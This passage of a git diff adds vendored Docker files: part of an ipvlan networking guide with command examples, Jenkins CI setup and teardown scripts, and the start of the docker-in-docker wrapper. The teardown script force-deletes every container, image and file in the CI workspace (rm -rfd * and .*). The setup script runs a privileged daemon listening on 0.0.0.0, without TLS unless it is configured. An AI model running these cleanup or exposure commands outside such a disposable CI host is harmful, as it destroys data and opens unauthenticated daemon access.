+docker run --net=ipvlan20 -it --name ivlan_test1 --rm alpine /bin/sh
+docker run --net=ipvlan20 -it --name ivlan_test2 --rm alpine /bin/sh
+```
+
+**Vlan ID 30**
+
+In the second network, tagged and isolated by the Docker host, `eth0.30` is the parent interface tagged with vlan id `30` specified with `-o parent=eth0.30`. The `ipvlan_mode=` defaults to l2 mode `ipvlan_mode=l2`. It can also be explicitly set with the same result as shown in the next example.
+
+```
+# now add networks and hosts as you would normally by attaching to the master (sub)interface that is tagged.
+docker network  create  -d ipvlan \
+    --subnet=192.168.30.0/24 \
+    --gateway=192.168.30.1 \
+    -o parent=eth0.30 \
+    -o ipvlan_mode=l2 ipvlan30
+
+# in two separate terminals, start a Docker container and the containers can now ping one another.
+docker run --net=ipvlan30 -it --name ivlan_test3 --rm alpine /bin/sh
+docker run --net=ipvlan30 -it --name ivlan_test4 --rm alpine /bin/sh
+```
+
+The gateway is set inside of the container as the default gateway. That gateway would typically be an external router on the network.
+
+```
+$ ip route
+  default via 192.168.30.1 dev eth0
+  192.168.30.0/24 dev eth0  src 192.168.30.2
+```
+
+Example: Multi-Subnet Ipvlan L2 Mode starting two containers on the same subnet and pinging one another. In order for the `192.168.114.0/24` to reach `192.168.116.0/24` it requires an external router in L2 mode. L3 mode can route between subnets that share a common `-o parent=`. 
+
+Secondary addresses on network routers are common as an address space becomes exhausted to add another secondary to a L3 vlan interface or commonly referred to as a "switched virtual interface" (SVI).
+
+```
+docker network  create  -d ipvlan \
+    --subnet=192.168.114.0/24 --subnet=192.168.116.0/24 \
+    --gateway=192.168.114.254  --gateway=192.168.116.254 \
+     -o parent=eth0.114 \
+     -o ipvlan_mode=l2 ipvlan114
+     
+docker run --net=ipvlan114 --ip=192.168.114.10 -it --rm alpine /bin/sh
+docker run --net=ipvlan114 --ip=192.168.114.11 -it --rm alpine /bin/sh
+```
+
+A key takeaway is, operators have the ability to map their physical network into their virtual network for integrating containers into their environment with no operational overhauls required. NetOps simply drops an 802.1q trunk into the Docker host. That virtual link would be the `-o parent=` passed in the network creation. For untagged (non-VLAN) links, it is as simple as `-o parent=eth0` or for 802.1q trunks with VLAN IDs each network gets mapped to the corresponding VLAN/Subnet from the network.
+
+An example being, NetOps provides VLAN ID and the associated subnets for VLANs being passed on the Ethernet link to the Docker host server. Those values are simply plugged into the `docker network create` commands when provisioning the Docker networks. These are persistent configurations that are applied every time the Docker engine starts which alleviates having to manage often complex configuration files. The network interfaces can also be managed manually by being pre-created and docker networking will never modify them, simply use them as parent interfaces. Example mappings from NetOps to Docker network commands are as follows:
+
+- VLAN: 10, Subnet: 172.16.80.0/24, Gateway: 172.16.80.1
+
+    - `--subnet=172.16.80.0/24 --gateway=172.16.80.1 -o parent=eth0.10` 
+
+- VLAN: 20, IP subnet: 172.16.50.0/22, Gateway: 172.16.50.1
+
+    - `--subnet=172.16.50.0/22 --gateway=172.16.50.1 -o parent=eth0.20 ` 
+
+- VLAN: 30, Subnet: 10.1.100.0/16, Gateway: 10.1.100.1
+
+    - `--subnet=10.1.100.0/16 --gateway=10.1.100.1 -o parent=eth0.30` 
+
+### IPVlan L3 Mode Example
+
+IPVlan will require routes to be distributed to each endpoint. The driver only builds the Ipvlan L3 mode port and attaches the container to the interface. Route distribution throughout a cluster is beyond the initial implementation of this single host scoped driver. In L3 mode, the Docker host is very similar to a router starting new networks in the container. They are on networks that the upstream network will not know about without route distribution. For those curious how Ipvlan L3 will fit into container networking see the following examples.
+
+![Docker Ipvlan L2 Mode](images/ipvlan-l3.png)
+
+Ipvlan L3 mode drops all broadcast and multicast traffic. This reason alone makes Ipvlan L3 mode a prime candidate for those looking for massive scale and predictable network integrations. It is predictable and in turn will lead to greater uptimes because there is no bridging involved. Bridging loops have been responsible for high profile outages that can be hard to pinpoint depending on the size of the failure domain. This is due to the cascading nature of BPDUs (Bridge Port Data Units) that are flooded throughout a broadcast domain (VLAN) to find and block topology loops. Eliminating bridging domains, or at the least, keeping them isolated to a pair of ToRs (top of rack switches) will reduce hard to troubleshoot bridging instabilities. Ipvlan L2 modes is well suited for isolated VLANs only trunked into a pair of ToRs that can provide a loop-free non-blocking fabric. The next step further is to route at the edge via Ipvlan L3 mode that reduces a failure domain to a local host only. 
+
+- L3 mode needs to be on a separate subnet as the default namespace since it requires a netlink route in the default namespace pointing to the Ipvlan parent interface.
+
+- The parent interface used in this example is `eth0` and it is on the subnet `192.168.1.0/24`. Notice the `docker network` is **not** on the same subnet as `eth0`.
+
+- Unlike ipvlan l2 modes, different subnets/networks can ping one another as long as they share the same parent interface `-o parent=`.
+
+```
+ip a show eth0
+3: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
+    link/ether 00:50:56:39:45:2e brd ff:ff:ff:ff:ff:ff
+    inet 192.168.1.250/24 brd 192.168.1.255 scope global eth0
+```
+
+-A traditional gateway doesn't mean much to an L3 mode Ipvlan interface since there is no broadcast traffic allowed. Because of that, the container default gateway simply point the the containers `eth0` device. See below for CLI output of `ip route` or `ip -6 route` from inside an L3 container for details.
+
+The mode ` -o ipvlan_mode=l3` must be explicitly specified since the default ipvlan mode is `l2`.
+
+The following example does not specify a parent interface. The network drivers will create a dummy type link for the user rather then rejecting the network creation and isolating containers from only communicating with one another.
+
+```
+# Create the Ipvlan L3 network
+docker network  create  -d ipvlan \
+    --subnet=192.168.214.0/24 \
+    --subnet=10.1.214.0/24 \
+     -o ipvlan_mode=l3 ipnet210
+
+# Test 192.168.214.0/24 connectivity
+docker run --net=ipnet210 --ip=192.168.214.10 -itd alpine /bin/sh
+docker run --net=ipnet210 --ip=10.1.214.10 -itd alpine /bin/sh
+
+# Test L3 connectivity from 10.1.214.0/24 to 192.168.212.0/24
+docker run --net=ipnet210 --ip=192.168.214.9 -it --rm alpine ping -c 2 10.1.214.10
+
+# Test L3 connectivity from 192.168.212.0/24 to 10.1.214.0/24
+docker run --net=ipnet210 --ip=10.1.214.9 -it --rm alpine ping -c 2 192.168.214.10
+
+```
+
+Notice there is no `--gateway=` option in the network create. The field is ignored if one is specified `l3` mode. Take a look at the container routing table from inside of the container:
+
+```
+# Inside an L3 mode container
+$ ip route
+  default dev eth0
+  192.168.120.0/24 dev eth0  src 192.168.120.2
+```
+
+In order to ping the containers from a remote Docker host or the container be able to ping a remote host, the remote host or the physical network in between need to have a route pointing to the host IP address of the container's Docker host eth interface. More on this as we evolve the Ipvlan `L3` story.
+
+### Dual Stack IPv4 IPv6 Ipvlan L2 Mode
+
+- Not only does Libnetwork give you complete control over IPv4 addressing, but it also gives you total control over IPv6 addressing as well as feature parity between the two address families.
+
+- The next example will start with IPv6 only. Start two containers on the same VLAN `139` and ping one another. Since the IPv4 subnet is not specified, the default IPAM will provision a default IPv4 subnet. That subnet is isolated unless the upstream network is explicitly routing it on VLAN `139`.
+
+```
+# Create a v6 network
+docker network create -d ipvlan \
+    --subnet=2001:db8:abc2::/64 --gateway=2001:db8:abc2::22 \
+    -o parent=eth0.139 v6ipvlan139
+    
+# Start a container on the network
+docker run --net=v6ipvlan139 -it --rm alpine /bin/sh
+
+```
+
+View the container eth0 interface and v6 routing table:
+
+```
+ eth0@if55: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN group default
+    link/ether 00:50:56:2b:29:40 brd ff:ff:ff:ff:ff:ff
+    inet 172.18.0.2/16 scope global eth0
+       valid_lft forever preferred_lft forever
+    inet6 2001:db8:abc4::250:56ff:fe2b:2940/64 scope link
+       valid_lft forever preferred_lft forever
+    inet6 2001:db8:abc2::1/64 scope link nodad
+       valid_lft forever preferred_lft forever
+       
+root@5c1dc74b1daa:/# ip -6 route
+2001:db8:abc4::/64 dev eth0  proto kernel  metric 256
+2001:db8:abc2::/64 dev eth0  proto kernel  metric 256
+default via 2001:db8:abc2::22 dev eth0  metric 1024
+```
+
+Start a second container and ping the first container's v6 address. 
+
+```
+$ docker run --net=v6ipvlan139 -it --rm alpine /bin/sh
+
+root@b817e42fcc54:/# ip a show eth0
+75: eth0@if55: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN group default
+    link/ether 00:50:56:2b:29:40 brd ff:ff:ff:ff:ff:ff
+    inet 172.18.0.3/16 scope global eth0
+       valid_lft forever preferred_lft forever
+    inet6 2001:db8:abc4::250:56ff:fe2b:2940/64 scope link tentative dadfailed
+       valid_lft forever preferred_lft forever
+    inet6 2001:db8:abc2::2/64 scope link nodad
+       valid_lft forever preferred_lft forever
+
+root@b817e42fcc54:/# ping6 2001:db8:abc2::1
+PING 2001:db8:abc2::1 (2001:db8:abc2::1): 56 data bytes
+64 bytes from 2001:db8:abc2::1%eth0: icmp_seq=0 ttl=64 time=0.044 ms
+64 bytes from 2001:db8:abc2::1%eth0: icmp_seq=1 ttl=64 time=0.058 ms
+
+2 packets transmitted, 2 packets received, 0% packet loss
+round-trip min/avg/max/stddev = 0.044/0.051/0.058/0.000 ms
+```
+
+The next example with setup a dual stack IPv4/IPv6 network with an example VLAN ID of `140`.
+
+Next create a network with two IPv4 subnets and one IPv6 subnets, all of which have explicit gateways:
+
+```
+docker network  create  -d ipvlan \
+    --subnet=192.168.140.0/24 --subnet=192.168.142.0/24 \
+    --gateway=192.168.140.1  --gateway=192.168.142.1 \
+    --subnet=2001:db8:abc9::/64 --gateway=2001:db8:abc9::22 \
+     -o parent=eth0.140 \
+     -o ipvlan_mode=l2 ipvlan140
+```
+
+Start a container and view eth0 and both v4 & v6 routing tables:
+
+```
+docker run --net=v6ipvlan139 --ip6=2001:db8:abc2::51 -it --rm alpine /bin/sh
+
+root@3cce0d3575f3:/# ip a show eth0
+78: eth0@if77: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN group default
+    link/ether 00:50:56:2b:29:40 brd ff:ff:ff:ff:ff:ff
+    inet 192.168.140.2/24 scope global eth0
+       valid_lft forever preferred_lft forever
+    inet6 2001:db8:abc4::250:56ff:fe2b:2940/64 scope link
+       valid_lft forever preferred_lft forever
+    inet6 2001:db8:abc9::1/64 scope link nodad
+       valid_lft forever preferred_lft forever
+
+root@3cce0d3575f3:/# ip route
+default via 192.168.140.1 dev eth0
+192.168.140.0/24 dev eth0  proto kernel  scope link  src 192.168.140.2
+
+root@3cce0d3575f3:/# ip -6 route
+2001:db8:abc4::/64 dev eth0  proto kernel  metric 256
+2001:db8:abc9::/64 dev eth0  proto kernel  metric 256
+default via 2001:db8:abc9::22 dev eth0  metric 1024
+```
+
+Start a second container with a specific `--ip4` address and ping the first host using IPv4 packets:
+
+```
+docker run --net=ipvlan140 --ip=192.168.140.10 -it --rm alpine /bin/sh
+```
+
+**Note**: Different subnets on the same parent interface in Ipvlan `L2` mode cannot ping one another. That requires a router to proxy-arp the requests with a secondary subnet. However, Ipvlan `L3` will route the unicast traffic between disparate subnets as long as they share the same `-o parent` parent link.
+
+### Dual Stack IPv4 IPv6 Ipvlan L3 Mode 
+
+**Example:** IpVlan L3 Mode Dual Stack IPv4/IPv6, Multi-Subnet w/ 802.1q Vlan Tag:118
+
+As in all of the examples, a tagged VLAN interface does not have to be used. The sub-interfaces can be swapped with `eth0`, `eth1`, `bond0` or any other valid interface on the host other then the `lo` loopback.
+
+The primary difference you will see is that L3 mode does not create a default route with a next-hop but rather sets a default route pointing to `dev eth` only since ARP/Broadcasts/Multicast are all filtered by Linux as per the design. Since the parent interface is essentially acting as a router, the parent interface IP and subnet needs to be different from the container networks. That is the opposite of bridge and L2 modes, which need to be on the same subnet (broadcast domain) in order to forward broadcast and multicast packets.
+
+```
+# Create an IPv6+IPv4 Dual Stack Ipvlan L3 network 
+# Gateways for both v4 and v6 are set to a dev e.g. 'default dev eth0'
+docker network  create  -d ipvlan \
+    --subnet=192.168.110.0/24 \
+    --subnet=192.168.112.0/24 \
+    --subnet=2001:db8:abc6::/64 \
+     -o parent=eth0 \
+     -o ipvlan_mode=l3 ipnet110
+
+
+# Start a few of containers on the network (ipnet110) 
+# in separate terminals and check connectivity
+docker run --net=ipnet110 -it --rm alpine /bin/sh
+# Start a second container specifying the v6 address
+docker run --net=ipnet110 --ip6=2001:db8:abc6::10 -it --rm alpine /bin/sh
+# Start a third specifying the IPv4 address
+docker run --net=ipnet110 --ip=192.168.112.50 -it --rm alpine /bin/sh
+# Start a 4th specifying both the IPv4 and IPv6 addresses
+docker run --net=ipnet110 --ip6=2001:db8:abc6::50 --ip=192.168.112.50 -it --rm alpine /bin/sh
+```
+
+Interface and routing table outputs are as follows:
+
+```
+root@3a368b2a982e:/# ip a show eth0
+63: eth0@if59: <BROADCAST,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN group default
+    link/ether 00:50:56:2b:29:40 brd ff:ff:ff:ff:ff:ff
+    inet 192.168.112.2/24 scope global eth0
+       valid_lft forever preferred_lft forever
+    inet6 2001:db8:abc4::250:56ff:fe2b:2940/64 scope link
+       valid_lft forever preferred_lft forever
+    inet6 2001:db8:abc6::10/64 scope link nodad
+       valid_lft forever preferred_lft forever
+     
+# Note the default route is simply the eth device because ARPs are filtered.
+root@3a368b2a982e:/# ip route
+  default dev eth0  scope link
+  192.168.112.0/24 dev eth0  proto kernel  scope link  src 192.168.112.2
+
+root@3a368b2a982e:/# ip -6 route
+2001:db8:abc4::/64 dev eth0  proto kernel  metric 256
+2001:db8:abc6::/64 dev eth0  proto kernel  metric 256
+default dev eth0  metric 1024
+```
+
+*Note:* There may be a bug when specifying `--ip6=` addresses when you delete a container with a specified v6 address and then start a new container with the same v6 address it throws the following like the address isn't properly being released to the v6 pool. It will fail to unmount the container and be left dead.
+
+```
+docker: Error response from daemon: Address already in use.
+```
+
+### Manually Creating 802.1q Links
+
+**Vlan ID 40**
+
+If a user does not want the driver to create the vlan sub-interface it simply needs to exist prior to the `docker network create`. If you have sub-interface naming that is not `interface.vlan_id` it is honored in the `-o parent=` option again as long as the interface exists and us up.
+
+Links if manually created can be named anything you want. As long as the exist when the network is created that is all that matters. Manually created links do not get deleted regardless of the name when the network is deleted with `docker network rm`.
+
+```
+# create a new sub-interface tied to dot1q vlan 40
+ip link add link eth0 name eth0.40 type vlan id 40
+
+# enable the new sub-interface
+ip link set eth0.40 up
+
+# now add networks and hosts as you would normally by attaching to the master (sub)interface that is tagged
+docker network  create  -d ipvlan \
+   --subnet=192.168.40.0/24 \
+   --gateway=192.168.40.1 \
+   -o parent=eth0.40 ipvlan40
+
+# in two separate terminals, start a Docker container and the containers can now ping one another.
+docker run --net=ipvlan40 -it --name ivlan_test5 --rm alpine /bin/sh
+docker run --net=ipvlan40 -it --name ivlan_test6 --rm alpine /bin/sh
+```
+
+**Example:** Vlan sub-interface manually created with any name:
+
+```
+# create a new sub interface tied to dot1q vlan 40
+ip link add link eth0 name foo type vlan id 40
+
+# enable the new sub-interface
+ip link set foo up
+
+# now add networks and hosts as you would normally by attaching to the master (sub)interface that is tagged
+docker network  create  -d ipvlan \
+    --subnet=192.168.40.0/24 --gateway=192.168.40.1 \
+    -o parent=foo ipvlan40
+
+# in two separate terminals, start a Docker container and the containers can now ping one another.
+docker run --net=ipvlan40 -it --name ivlan_test5 --rm alpine /bin/sh
+docker run --net=ipvlan40 -it --name ivlan_test6 --rm alpine /bin/sh
+```
+
+Manually created links can be cleaned up with:
+
+```
+ip link del foo
+```
+
+As with all of the Libnetwork drivers, they can be mixed and matched, even as far as running 3rd party ecosystem drivers in parallel for maximum flexibility to the Docker user.
diff --git a/vendor/github.com/docker/docker/hack/Jenkins/W2L/postbuild.sh b/vendor/github.com/docker/docker/hack/Jenkins/W2L/postbuild.sh
new file mode 100644
index 0000000000..662e2dcc37
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/Jenkins/W2L/postbuild.sh
@@ -0,0 +1,35 @@
+set +x
+set +e 
+
+echo ""
+echo ""
+echo "---"
+echo "Now starting POST-BUILD steps"
+echo "---"
+echo ""
+
+echo INFO: Pointing to $DOCKER_HOST
+
+if [ ! $(docker ps -aq | wc -l) -eq 0 ]; then
+	echo INFO: Removing containers...
+	! docker rm -vf $(docker ps -aq)
+fi
+
+# Remove all images which don't have docker or debian in the name
+if [ ! $(docker images | sed -n '1!p' | grep -v 'docker' | grep -v 'debian' | awk '{ print $3 }' | wc -l) -eq 0 ]; then 
+	echo INFO: Removing images...
+	! docker rmi -f $(docker images | sed -n '1!p' | grep -v 'docker' | grep -v 'debian' | awk '{ print $3 }') 
+fi
+
+# Kill off any instances of git, go and docker, just in case
+! taskkill -F -IM git.exe -T >& /dev/null
+! taskkill -F -IM go.exe -T >& /dev/null
+! taskkill -F -IM docker.exe -T >& /dev/null
+
+# Remove everything
+! cd /c/jenkins/gopath/src/github.com/docker/docker
+! rm -rfd * >& /dev/null
+! rm -rfd .* >& /dev/null
+
+echo INFO: Cleanup complete
+exit 0
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/hack/Jenkins/W2L/setup.sh b/vendor/github.com/docker/docker/hack/Jenkins/W2L/setup.sh
new file mode 100644
index 0000000000..30e5884d97
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/Jenkins/W2L/setup.sh
@@ -0,0 +1,309 @@
+# Jenkins CI script for Windows to Linux CI.
+# Heavily modified by John Howard (@jhowardmsft) December 2015 to try to make it more reliable.
+set +xe
+SCRIPT_VER="Wed Apr 20 18:30:19 UTC 2016"
+
+# TODO to make (even) more resilient: 
+#  - Wait for daemon to be running before executing docker commands
+#  - Check if jq is installed
+#  - Make sure bash is v4.3 or later. Can't do until all Azure nodes on the latest version
+#  - Make sure we are not running as local system. Can't do until all Azure nodes are updated.
+#  - Error if docker versions are not equal. Can't do until all Azure nodes are updated
+#  - Error if go versions are not equal. Can't do until all Azure nodes are updated.
+#  - Error if running 32-bit posix tools. Probably can take from bash --version and check contains "x86_64"
+#  - Warn if the CI directory cannot be deleted afterwards. Otherwise turdlets are left behind
+#  - Use %systemdrive% ($SYSTEMDRIVE) rather than hard code to c: for TEMP
+#  - Consider cross builing the Windows binary and copy across. That's a bit of a heavy lift. Only reason
+#    for doing that is that it mirrors the actual release process for docker.exe which is cross-built.
+#    However, should absolutely not be a problem if built natively, so nit-picking.
+#  - Tidy up of images and containers. Either here, or in the teardown script.
+
+ec=0
+uniques=1
+echo INFO: Started at `date`. Script version $SCRIPT_VER
+
+
+# !README!
+# There are two daemons running on the remote Linux host:
+# 	- outer: specified by DOCKER_HOST, this is the daemon that will build and run the inner docker daemon
+#			from the sources matching the PR.
+#	- inner: runs on the host network, on a port number similar to that of DOCKER_HOST but the last two digits are inverted
+#			(2357 if DOCKER_HOST had port 2375; and 2367 if DOCKER_HOST had port 2376).
+#			The windows integration tests are run against this inner daemon.
+
+# get the ip, inner and outer ports.
+ip="${DOCKER_HOST#*://}"
+port_outer="${ip#*:}"
+# inner port is like outer port with last two digits inverted.
+port_inner=$(echo "$port_outer" | sed -E 's/(.)(.)$/\2\1/')
+ip="${ip%%:*}"
+
+echo "INFO: IP=$ip PORT_OUTER=$port_outer PORT_INNER=$port_inner"
+
+# If TLS is enabled
+if [ -n "$DOCKER_TLS_VERIFY" ]; then
+	protocol=https
+	if [ -z "$DOCKER_MACHINE_NAME" ]; then
+		ec=1
+		echo "ERROR: DOCKER_MACHINE_NAME is undefined"
+	fi
+	certs=$(echo ~/.docker/machine/machines/$DOCKER_MACHINE_NAME)
+	curlopts="--cacert $certs/ca.pem --cert $certs/cert.pem --key $certs/key.pem"
+	run_extra_args="-v tlscerts:/etc/docker"
+	daemon_extra_args="--tlsverify --tlscacert /etc/docker/ca.pem --tlscert /etc/docker/server.pem --tlskey /etc/docker/server-key.pem"
+else
+	protocol=http
+fi
+
+# Save for use by make.sh and scripts it invokes
+export MAIN_DOCKER_HOST="tcp://$ip:$port_inner"
+
+# Verify we can get the remote node to respond to _ping
+if [ $ec -eq 0 ]; then
+	reply=`curl -s $curlopts $protocol://$ip:$port_outer/_ping`
+	if [ "$reply" != "OK" ]; then
+		ec=1
+		echo "ERROR: Failed to get an 'OK' response from the docker daemon on the Linux node"
+		echo "       at $ip:$port_outer when called with an http request for '_ping'. This implies that"
+		echo "       either the daemon has crashed/is not running, or the Linux node is unavailable."
+		echo
+		echo "       A regular ping to the remote Linux node is below. It should reply. If not, the"
+		echo "       machine cannot be reached at all and may have crashed. If it does reply, it is"
+		echo "       likely a case of the Linux daemon not running or having crashed, which requires"
+		echo "       further investigation."
+		echo
+		echo "       Try re-running this CI job, or ask on #docker-dev or #docker-maintainers"
+		echo "       for someone to perform further diagnostics, or take this node out of rotation."
+		echo
+		ping $ip
+	else
+		echo "INFO: The Linux nodes outer daemon replied to a ping. Good!"
+	fi 
+fi
+
+# Get the version from the remote node. Note this may fail if jq is not installed.
+# That's probably worth checking to make sure, just in case.
+if [ $ec -eq 0 ]; then
+	remoteVersion=`curl -s $curlopts $protocol://$ip:$port_outer/version | jq -c '.Version'`
+	echo "INFO: Remote daemon is running docker version $remoteVersion"
+fi
+
+# Compare versions. We should really fail if result is no 1. Output at end of script.
+if [ $ec -eq 0 ]; then
+	uniques=`docker version | grep Version | /usr/bin/sort -u | wc -l`
+fi
+
+# Make sure we are in repo
+if [ $ec -eq 0 ]; then
+	if [ ! -d hack ]; then
+		echo "ERROR: Are you sure this is being launched from a the root of docker repository?"
+		echo "       If this is a Windows CI machine, it should be c:\jenkins\gopath\src\github.com\docker\docker."
+                echo "       Current directory is `pwd`"
+		ec=1
+	fi
+fi
+
+# Are we in split binary mode?
+if [ `grep DOCKER_CLIENTONLY Makefile | wc -l` -gt 0 ]; then
+    splitBinary=0
+	echo "INFO: Running in single binary mode"
+else
+    splitBinary=1
+	echo "INFO: Running in split binary mode"
+fi
+
+
+# Get the commit has and verify we have something
+if [ $ec -eq 0 ]; then
+	export COMMITHASH=$(git rev-parse --short HEAD)
+	echo INFO: Commmit hash is $COMMITHASH
+	if [ -z $COMMITHASH ]; then
+		echo "ERROR: Failed to get commit hash. Are you sure this is a docker repository?"
+		ec=1
+	fi
+fi
+
+# Redirect to a temporary location. Check is here for local runs from Jenkins machines just in case not
+# in the right directory where the repo is cloned. We also redirect TEMP to not use the environment
+# TEMP as when running as a standard user (not local system), it otherwise exposes a bug in posix tar which
+# will cause CI to fail from Windows to Linux. Obviously it's not best practice to ever run as local system...
+if [ $ec -eq 0 ]; then
+	export TEMP=/c/CI/CI-$COMMITHASH
+	export TMP=$TEMP
+	/usr/bin/mkdir -p $TEMP  # Make sure Linux mkdir for -p
+fi
+
+# Tidy up time
+if [ $ec -eq 0 ]; then
+	echo INFO: Deleting pre-existing containers and images...
+    
+	# Force remove all containers based on a previously built image with this commit
+	! docker rm -f $(docker ps -aq --filter "ancestor=docker:$COMMITHASH") &>/dev/null
+    
+	# Force remove any container with this commithash as a name
+	! docker rm -f $(docker ps -aq --filter "name=docker-$COMMITHASH") &>/dev/null
+
+	# This SHOULD never happen, but just in case, also blow away any containers
+	# that might be around.
+	! if [ ! $(docker ps -aq | wc -l) -eq 0 ]; then
+		echo WARN: There were some leftover containers. Cleaning them up.
+		! docker rm -f $(docker ps -aq)
+	fi
+	
+    # Force remove the image if it exists
+	! docker rmi -f "docker-$COMMITHASH" &>/dev/null
+fi
+
+# Provide the docker version for debugging purposes. If these fail, game over. 
+# as the Linux box isn't responding for some reason.
+if [ $ec -eq 0 ]; then
+	echo INFO: Docker version and info of the outer daemon on the Linux node
+	echo
+	docker version
+	ec=$?
+	if [ 0 -ne $ec ]; then
+		echo "ERROR: The main linux daemon does not appear to be running. Has the Linux node crashed?"
+	fi
+	echo
+fi
+
+# Same as above, but docker info
+if [ $ec -eq 0 ]; then
+	echo
+	docker info
+	ec=$?
+	if [ 0 -ne $ec ]; then
+		echo "ERROR: The main linux daemon does not appear to be running. Has the Linux node crashed?"
+	fi
+	echo
+fi
+
+# build the daemon image
+if [ $ec -eq 0 ]; then
+	echo "INFO: Running docker build on Linux host at $DOCKER_HOST"
+	if [ $splitBinary -eq 0 ]; then
+		set -x
+		docker build --rm --force-rm --build-arg APT_MIRROR=cdn-fastly.deb.debian.org -t "docker:$COMMITHASH" .
+    cat <<EOF | docker build --rm --force-rm -t "docker:$COMMITHASH" -
+FROM docker:$COMMITHASH
+RUN hack/make.sh binary
+RUN cp bundles/latest/binary/docker /bin/docker 
+CMD docker daemon -D -H tcp://0.0.0.0:$port_inner $daemon_extra_args
+EOF
+	else
+		set -x
+		docker build --rm --force-rm --build-arg APT_MIRROR=cdn-fastly.deb.debian.org -t "docker:$COMMITHASH" .
+    cat <<EOF | docker build --rm --force-rm -t "docker:$COMMITHASH" -
+FROM docker:$COMMITHASH
+RUN hack/make.sh binary
+RUN cp bundles/latest/binary-daemon/dockerd /bin/dockerd 
+CMD dockerd -D -H tcp://0.0.0.0:$port_inner $daemon_extra_args
+EOF
+
+	fi
+	ec=$?
+	set +x
+	if [ 0 -ne $ec ]; then
+		echo "ERROR: docker build failed"
+	fi
+fi
+
+# Start the docker-in-docker daemon from the image we just built
+if [ $ec -eq 0 ]; then
+	echo "INFO: Starting build of a Linux daemon to test against, and starting it..."
+	set -x
+	# aufs in aufs is faster than vfs in aufs
+	docker run -d $run_extra_args -e DOCKER_GRAPHDRIVER=aufs --pid host --privileged --name "docker-$COMMITHASH" --net host "docker:$COMMITHASH"
+	ec=$?
+	set +x
+	if [ 0 -ne $ec ]; then
+	    	echo "ERROR: Failed to compile and start the linux daemon"
+	fi
+fi
+
+# Build locally.
+if [ $ec -eq 0 ]; then
+	echo "INFO: Starting local build of Windows binary..."
+	set -x
+	export TIMEOUT="120m"
+	export DOCKER_HOST="tcp://$ip:$port_inner"
+    # This can be removed
+	export DOCKER_TEST_HOST="tcp://$ip:$port_inner"
+	unset DOCKER_CLIENTONLY
+	export DOCKER_REMOTE_DAEMON=1
+	hack/make.sh binary 
+	ec=$?
+	set +x
+	if [ 0 -ne $ec ]; then
+	    echo "ERROR: Build of binary on Windows failed"
+	fi
+fi
+
+# Make a local copy of the built binary and ensure that is first in our path
+if [ $ec -eq 0 ]; then
+	VERSION=$(< ./VERSION)
+	if [ $splitBinary -eq 0 ]; then
+		cp bundles/$VERSION/binary/docker.exe $TEMP
+	else
+		cp bundles/$VERSION/binary-client/docker.exe $TEMP
+	fi
+	ec=$?
+	if [ 0 -ne $ec ]; then
+		echo "ERROR: Failed to copy built binary to $TEMP"
+	fi
+	export PATH=$TEMP:$PATH
+fi
+
+# Run the integration tests
+if [ $ec -eq 0 ]; then	
+	echo "INFO: Running Integration tests..."
+	set -x
+	export DOCKER_TEST_TLS_VERIFY="$DOCKER_TLS_VERIFY"
+	export DOCKER_TEST_CERT_PATH="$DOCKER_CERT_PATH"
+	#export TESTFLAGS='-check.vv'
+	hack/make.sh test-integration-cli
+	ec=$?
+	set +x
+	if [ 0 -ne $ec ]; then
+		echo "ERROR: CLI test failed."
+		# Next line is useful, but very long winded if included
+		docker -H=$MAIN_DOCKER_HOST logs --tail 100 "docker-$COMMITHASH"
+    fi
+fi
+
+# Tidy up any temporary files from the CI run
+if [ ! -z $COMMITHASH ]; then
+	rm -rf $TEMP
+fi
+
+# CI Integrity check - ensure we are using the same version of go as present in the Dockerfile
+GOVER_DOCKERFILE=`grep 'ENV GO_VERSION' Dockerfile | awk '{print $3}'`
+GOVER_INSTALLED=`go version | awk '{print $3}'`
+if [ "${GOVER_INSTALLED:2}" != "$GOVER_DOCKERFILE" ]; then
+	#ec=1  # Uncomment to make CI fail once all nodes are updated.
+	echo
+	echo "---------------------------------------------------------------------------"
+	echo "WARN: CI should be using go version $GOVER_DOCKERFILE, but is using ${GOVER_INSTALLED:2}"
+	echo "      Please ping #docker-maintainers on IRC to get this CI server updated."
+	echo "---------------------------------------------------------------------------"
+	echo
+fi
+
+# Check the Linux box is running a matching version of docker
+if [ "$uniques" -ne 1 ]; then
+    ec=0  # Uncomment to make CI fail once all nodes are updated.
+	echo
+	echo "---------------------------------------------------------------------------"
+	echo "ERROR: This CI node is not running the same version of docker as the daemon."
+	echo "       This is a CI configuration issue."
+	echo "---------------------------------------------------------------------------"
+	echo
+fi
+
+# Tell the user how we did.
+if [ $ec -eq 0 ]; then
+	echo INFO: Completed successfully at `date`. 
+else
+	echo ERROR: Failed with exitcode $ec at `date`.
+fi
+exit $ec
diff --git a/vendor/github.com/docker/docker/hack/Jenkins/readme.md b/vendor/github.com/docker/docker/hack/Jenkins/readme.md
new file mode 100644
index 0000000000..ace3f3f563
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/Jenkins/readme.md
@@ -0,0 +1,3 @@
+These files under this directory are for reference only. 
+
+They are used by Jenkins for CI runs.
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/hack/dind b/vendor/github.com/docker/docker/hack/dind
new file mode 100755
index 0000000000..082c3d31fe
--- /dev/null
+++ b/vendor/github.com/docker/docker/hack/dind
@@ -0,0 +1,33 @@
+#!/bin/bash
+set -e
+
+# DinD: a wrapper script which allows docker to be run inside a docker container.
+# Original version by Jerome Petazzoni <jerome@docker.com>
+# See the blog post: https://blog.docker.com/2013/09/docker-can-now-run-within-docker/
+#
+# This script should be executed inside a docker container in privileged mode
+# ('docker run --privileged', introduced in docker 0.6).
+
+# Usage: dind CMD [ARG...]
+
+# apparmor sucks and Docker needs to know that it's in a container (c) @tianon
+export container=docker
+
+if [ -d /sys/kernel/security ] && ! mountpoint -q /sys/kernel/security; then
+	mount -t securityfs none /sys/kernel/security || {
+		echo >&2 'Could not mount /sys/kernel/security.'
+		echo >&2 'AppArmor detection and --privileged mode might break.'
+	}
+fi
+
+# Mount /tmp (conditionally)
+if ! mountpoint -q /tmp; then
